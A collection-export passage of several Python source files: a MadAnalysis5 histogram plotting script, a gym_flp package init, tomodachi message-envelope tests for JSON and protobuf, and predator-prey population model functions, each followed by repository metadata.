0,0.0,0.0,0.00571686220542,0.0,0.0,0.0,0.00566683706835,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00570356146684,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00575000989748,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_16
y11_M_16_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00203241406042,0.0,0.0,0.00067650764146,0.000677297918033,0.00067863838533,0.000675013565418,0.0,0.000677348014119,0.00203181492856,0.0,0.00135391051585,0.0013552955932,0.00135434983108,0.0020298197473,0.000677001816964,0.000675013565418,0.0,0.00203381299721,0.0,0.0,0.0,0.0,0.000677402874385,0.0,0.00135265363827,0.0,0.000677831361939,0.000677572652472,0.0,0.00135476373736,0.0,0.0,0.00067863838533,0.0,0.0,0.000677348014119,0.00067650764146,0.0,0.0,0.0,0.000679381597569,0.000677051768681,0.0,0.0,0.000676887620989,0.00135423563511,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000674995086171,0.0,0.0,0.0,0.0,0.00135439963843,0.0,0.00135521792261,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0006757612531,0.0,0.0,0.0,0.0,0.0,0.000675013565418,0.0,0.0,0.0,0.000679381597569,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000677753691351,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000675013565418,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000675579636745,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000677831361939,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000677876116366,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000676288922241,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating a new Canvas
fig = plt.figure(figsize=(12,6),dpi=80)
frame = gridspec.GridSpec(1,1,right=0.7)
pad = fig.add_subplot(frame[0])
# Creating a new Stack
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights+y11_M_11_weights+y11_M_12_weights+y11_M_13_weights+y11_M_14_weights+y11_M_15_weights+y11_M_16_weights,\
label="$bg\_dip\_1600\_inf$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#e5e5e5", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights+y11_M_11_weights+y11_M_12_weights+y11_M_13_weights+y11_M_14_weights+y11_M_15_weights,\
label="$bg\_dip\_1200\_1600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#f2f2f2", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights+y11_M_11_weights+y11_M_12_weights+y11_M_13_weights+y11_M_14_weights,\
label="$bg\_dip\_800\_1200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ccc6aa", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights+y11_M_11_weights+y11_M_12_weights+y11_M_13_weights,\
label="$bg\_dip\_600\_800$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ccc6aa", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights+y11_M_11_weights+y11_M_12_weights,\
label="$bg\_dip\_400\_600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#c1bfa8", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights+y11_M_11_weights,\
label="$bg\_dip\_200\_400$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#bab5a3", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights,\
label="$bg\_dip\_100\_200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#b2a596", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights,\
label="$bg\_dip\_0\_100$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#b7a39b", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights,\
label="$bg\_vbf\_1600\_inf$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ad998c", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights,\
label="$bg\_vbf\_1200\_1600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#9b8e82", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights,\
label="$bg\_vbf\_800\_1200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#876656", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights,\
label="$bg\_vbf\_600\_800$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#afcec6", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights,\
label="$bg\_vbf\_400\_600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#84c1a3", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights,\
label="$bg\_vbf\_200\_400$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#89a8a0", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights,\
label="$bg\_vbf\_100\_200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#829e8c", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights,\
label="$bg\_vbf\_0\_100$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#adbcc6", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights,\
label="$signal$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#7a8e99", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
# Axis
plt.rc('text',usetex=False)
plt.xlabel(r"M [ a_{1} , a_{2} ] ( GeV ) ",\
fontsize=16,color="black")
plt.ylabel(r"$\mathrm{Events}$ $(\mathcal{L}_{\mathrm{int}} = 150.0\ \mathrm{fb}^{-1})$ ",\
fontsize=16,color="black")
# Boundary of y-axis
ymax=(y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights+y11_M_11_weights+y11_M_12_weights+y11_M_13_weights+y11_M_14_weights+y11_M_15_weights+y11_M_16_weights).max()*1.1
#ymin=0 # linear scale
ymin=min([x for x in (y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights+y11_M_11_weights+y11_M_12_weights+y11_M_13_weights+y11_M_14_weights+y11_M_15_weights+y11_M_16_weights) if x])/100. # log scale
plt.gca().set_ylim(ymin,ymax)
# Log/Linear scale for X-axis
plt.gca().set_xscale("linear")
#plt.gca().set_xscale("log",nonposx="clip")
# Log/Linear scale for Y-axis
#plt.gca().set_yscale("linear")
plt.gca().set_yscale("log",nonposy="clip")
# Legend
plt.legend(bbox_to_anchor=(1.05,1), loc=2, borderaxespad=0.)
# Saving the image
plt.savefig('../../HTML/MadAnalysis5job_0/selection_10.png')
plt.savefig('../../PDF/MadAnalysis5job_0/selection_10.png')
plt.savefig('../../DVI/MadAnalysis5job_0/selection_10.eps')
# Running!
if __name__ == '__main__':
selection_10()
| 316.092784
| 5,172
| 0.713626
| 16,225
| 61,322
| 2.65208
| 0.124006
| 0.4693
| 0.680316
| 0.876505
| 0.432094
| 0.40897
| 0.405903
| 0.393749
| 0.392424
| 0.380339
| 0
| 0.616475
| 0.027021
| 61,322
| 193
| 5,173
| 317.73057
| 0.104718
| 0.01572
| 0
| 0.185841
| 0
| 0.00885
| 0.017373
| 0.003365
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00885
| false
| 0
| 0.035398
| 0
| 0.044248
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
89aeef0594e93ed4bc9c391337f1d967f77a7fcf
| 65
|
py
|
Python
|
gym_flp/rewards/__init__.py
|
TejaswiniMedi/gym-flp
|
97d1d1b510896ab5b871cfc9f591fbbffd830ff4
|
[
"MIT"
] | 1
|
2021-05-10T01:38:21.000Z
|
2021-05-10T01:38:21.000Z
|
gym_flp/rewards/__init__.py
|
TejaswiniMedi/gym-flp
|
97d1d1b510896ab5b871cfc9f591fbbffd830ff4
|
[
"MIT"
] | 10
|
2021-03-11T15:32:12.000Z
|
2021-09-20T19:30:50.000Z
|
gym_flp/rewards/__init__.py
|
TejaswiniMedi/gym-flp
|
97d1d1b510896ab5b871cfc9f591fbbffd830ff4
|
[
"MIT"
] | 1
|
2021-05-29T10:23:46.000Z
|
2021-05-29T10:23:46.000Z
|
from gym_flp.rewards import mhc
from gym_flp.rewards import area
| 32.5
| 32
| 0.846154
| 12
| 65
| 4.416667
| 0.583333
| 0.264151
| 0.377358
| 0.641509
| 0.867925
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123077
| 65
| 2
| 33
| 32.5
| 0.929825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
981deb28ab5e832e600ffb51e547762743fd0ce7
| 10,488
|
py
|
Python
|
tests/test_envelope.py
|
xdmiodz/tomodachi
|
abe449b0d09683cfc4791e61bc951b0de796e80b
|
[
"MIT"
] | 1
|
2021-11-01T02:18:55.000Z
|
2021-11-01T02:18:55.000Z
|
tests/test_envelope.py
|
xdmiodz/tomodachi
|
abe449b0d09683cfc4791e61bc951b0de796e80b
|
[
"MIT"
] | 100
|
2021-04-21T10:00:09.000Z
|
2022-03-24T23:13:32.000Z
|
tests/test_envelope.py
|
tranvietanh1991/tomodachi
|
a815fc718b6cc42dc3fe241abb0e5a5829eba0e8
|
[
"MIT"
] | 1
|
2020-09-04T05:53:16.000Z
|
2020-09-04T05:53:16.000Z
|
import json
import os
import signal
import time
from typing import Any
import pytest
from google.protobuf.json_format import MessageToJson
from proto_build.message_pb2 import Person
from run_test_service_helper import start_service
from tomodachi.envelope.proto_build.protobuf.sns_sqs_message_pb2 import SNSSQSMessage # noqa
from tomodachi.validation.validation import RegexMissmatchException, validate_field_regex
def test_json_base(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_service.py", monkeypatch)
instance = services.get("test_dummy")
async def _async() -> None:
data = {"key": "value"}
t1 = time.time()
json_message = await instance.message_envelope.build_message(instance, "topic", data)
t2 = time.time()
result, message_uuid, timestamp = await instance.message_envelope.parse_message(json_message)
assert result.get("data") == data
assert result.get("metadata", {}).get("data_encoding") == "raw"
assert len(json.dumps(result.get("data"))) == len(json.dumps(data))
assert json.dumps(result.get("data")) == json.dumps(data)
assert len(message_uuid) == 73
assert message_uuid[0:36] == instance.uuid
assert timestamp >= t1
assert timestamp <= t2
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_json_base_large_message(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_service.py", monkeypatch)
instance = services.get("test_dummy")
async def _async() -> None:
data = ["item {}".format(i) for i in range(1, 10000)]
assert len(json.dumps(data)) > 60000
t1 = time.time()
json_message = await instance.message_envelope.build_message(instance, "topic", data)
assert len(json.dumps(json_message)) < 60000
t2 = time.time()
result, message_uuid, timestamp = await instance.message_envelope.parse_message(json_message)
assert result.get("metadata", {}).get("data_encoding") == "base64_gzip_json"
assert len(json.dumps(result.get("data"))) == len(json.dumps(data))
assert json.dumps(result.get("data")) == json.dumps(data)
assert len(message_uuid) == 73
assert message_uuid[0:36] == instance.uuid
assert timestamp >= t1
assert timestamp <= t2
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_base(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
t1 = time.time()
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
t2 = time.time()
result, message_uuid, timestamp = await instance.message_envelope.parse_message(protobuf_message, Person)
assert type(result.get("data")) is Person
assert result.get("data") == data
assert result.get("metadata", {}).get("data_encoding") == "proto"
assert result.get("data") == data
assert result.get("data").name == data.name
assert result.get("data").id == data.id
assert len(MessageToJson(result.get("data"))) == len(MessageToJson(data))
assert MessageToJson(result.get("data")) == MessageToJson(data)
assert len(message_uuid) == 73
assert message_uuid[0:36] == instance.uuid
assert timestamp >= t1
assert timestamp <= t2
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_base_no_proto_class(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
result, message_uuid, timestamp = await instance.message_envelope.parse_message(protobuf_message)
assert type(result.get("data")) is not Person
assert type(result.get("data")) is bytes
assert result.get("data") != data
assert result.get("data") == b"\n\x0212\x12\x08John Doe"
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_base_bad_proto_class(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
json_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(json_message, str)
with pytest.raises(AttributeError):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_validation_no_proto_class(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
instance.message_envelope.validate()
with pytest.raises(Exception):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_validation_bad_proto_class(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
instance.message_envelope.validate(proto_class=str)
with pytest.raises(Exception):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_object_validation_function(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
def test_validator(person: Person) -> None:
validate_field_regex(person.name, r"^[a-zA-Z ]+$")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(protobuf_message, Person, test_validator)
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_object_static_validation_function(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
def test_static_validator(person: Person) -> None:
validate_field_regex(person.name, r"^[a-zA-Z ]+$")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(protobuf_message, Person, test_static_validator)
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_object_validation_function_fail(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
def test_validator(person: Person) -> None:
validate_field_regex(person.name, r"^(#?[a-fA-F0-9]{6}|)$")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(protobuf_message, Person, test_validator)
with pytest.raises(RegexMissmatchException):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_object_static_validation_function_fail(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
def test_static_validator(person: Person) -> None:
validate_field_regex(person.name, r"^(#?[a-fA-F0-9]{6}|)$")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(protobuf_message, Person, test_static_validator)
with pytest.raises(RegexMissmatchException):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
| 36.041237
| 113
| 0.691266
| 1,316
| 10,488
| 5.261398
| 0.091945
| 0.025419
| 0.041306
| 0.063547
| 0.894136
| 0.894136
| 0.890526
| 0.879116
| 0.877527
| 0.864529
| 0
| 0.008806
| 0.187929
| 10,488
| 290
| 114
| 36.165517
| 0.804156
| 0.000381
| 0
| 0.785366
| 0
| 0
| 0.093875
| 0.044266
| 0
| 0
| 0
| 0
| 0.160976
| 1
| 0.073171
| false
| 0
| 0.053659
| 0
| 0.126829
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
98b6c45be0ec766d97578a01056a9244519386fe
| 3,936
|
py
|
Python
|
Python/Functions.py
|
ibrahimadlani/ProjectM3202c
|
dd71b708ff3b9e7471d702e1ca35e3446039fc62
|
[
"MIT"
] | null | null | null |
Python/Functions.py
|
ibrahimadlani/ProjectM3202c
|
dd71b708ff3b9e7471d702e1ca35e3446039fc62
|
[
"MIT"
] | null | null | null |
Python/Functions.py
|
ibrahimadlani/ProjectM3202c
|
dd71b708ff3b9e7471d702e1ca35e3446039fc62
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from math import exp
import Constants as Constants
def malthus(number_of_individuals:float):
return Constants.PREY_GROWTH_RATE * number_of_individuals
def malthusMortality(number_of_individuals:float):
return -Constants.PREDATOR_MORTALITY_RATE * number_of_individuals
def verhulst(number_of_individuals:float):
return Constants.PREY_GROWTH_RATE * number_of_individuals * (1 - number_of_individuals / Constants.ENVIRONMENTAL_CAPACITY)
def verhulstMortality(number_of_individuals:float):
return -Constants.PREDATOR_MORTALITY_RATE * number_of_individuals * (1 + number_of_individuals / Constants.ENVIRONMENTAL_CAPACITY)
def lotkaVolterraPrey(number_of_preys:float, number_of_predators:float):
return malthus(number_of_preys) - Constants.PREDATOR_PREDATION_RATE * number_of_preys * number_of_predators
def lotkaVolterraPredator(number_of_preys:float, number_of_predators:float):
return malthusMortality(number_of_predators) + Constants.PREDATOR_GROWTH_RATE * number_of_preys * number_of_predators
def lotkaVolterraVerhulstPrey(number_of_preys:float, number_of_predators:float):
return verhulst(number_of_preys) - Constants.PREDATOR_PREDATION_RATE * number_of_preys * number_of_predators
def lotkaVolterraVerhulstPredator(number_of_preys:float, number_of_predators:float):
return verhulstMortality(number_of_predators) + Constants.PREDATOR_GROWTH_RATE * number_of_preys * number_of_predators
# def gausePrey(number_of_preys:float, number_of_predators:float):
# return malthus(number_of_preys) - (number_of_preys ** Constants.PREDATOR_SATIETY) * number_of_predators
# def hollingIIPrey(number_of_preys:float, number_of_predators:float):
# return verhulst(number_of_preys) - (Constants.PREDATION_RATE_PER_UNIT_OF_TIME * number_of_preys * number_of_predators)/(1 + Constants.PREDATION_RATE_PER_UNIT_OF_TIME * Constants.CAPTURE_TIME * number_of_preys)
# def hollingIIPredator(number_of_preys:float, number_of_predators:float):
# return -Constants.PREDATOR_MORTALITY_RATE * number_of_predators + (Constants.SEARCH_TIME * Constants.PREDATION_RATE_PER_UNIT_OF_TIME * number_of_preys * number_of_predators)/(1 + Constants.PREDATION_RATE_PER_UNIT_OF_TIME * number_of_preys * number_of_predators)
# def hollingIIIPrey(number_of_preys:float, number_of_predators:float):
# return verhulst(number_of_preys) - (Constants.PREDATION_RATE_PER_UNIT_OF_TIME * number_of_preys**2 * number_of_predators)/(1 + Constants.PREDATION_RATE_PER_UNIT_OF_TIME * Constants.CAPTURE_TIME * number_of_preys**2)
# def hollingIIIPredator(number_of_preys:float, number_of_predators:float):
# return -Constants.PREDATOR_MORTALITY_RATE * number_of_predators + (Constants.SEARCH_TIME * Constants.PREDATION_RATE_PER_UNIT_OF_TIME * number_of_preys**2 * number_of_predators)/(1 + Constants.PREDATION_RATE_PER_UNIT_OF_TIME * number_of_preys**2 * number_of_predators)
def malthusAnalytic(time:float):
return Constants.INITIAL_NUMBER_OF_PREYS * exp(Constants.PREY_GROWTH_RATE * time)
def lotkaVolterraFunctionalResponse(number_of_preys:float, number_of_predators:float):
return Constants.PREDATOR_PREDATION_RATE * number_of_preys * number_of_predators
def gauseFunctionalResponse(number_of_preys:float, number_of_predators:float):
return (number_of_preys ** Constants.PREDATOR_SATIETY) * number_of_predators
def hollingIIFunctionalResponse(number_of_preys:float, number_of_predators:float):
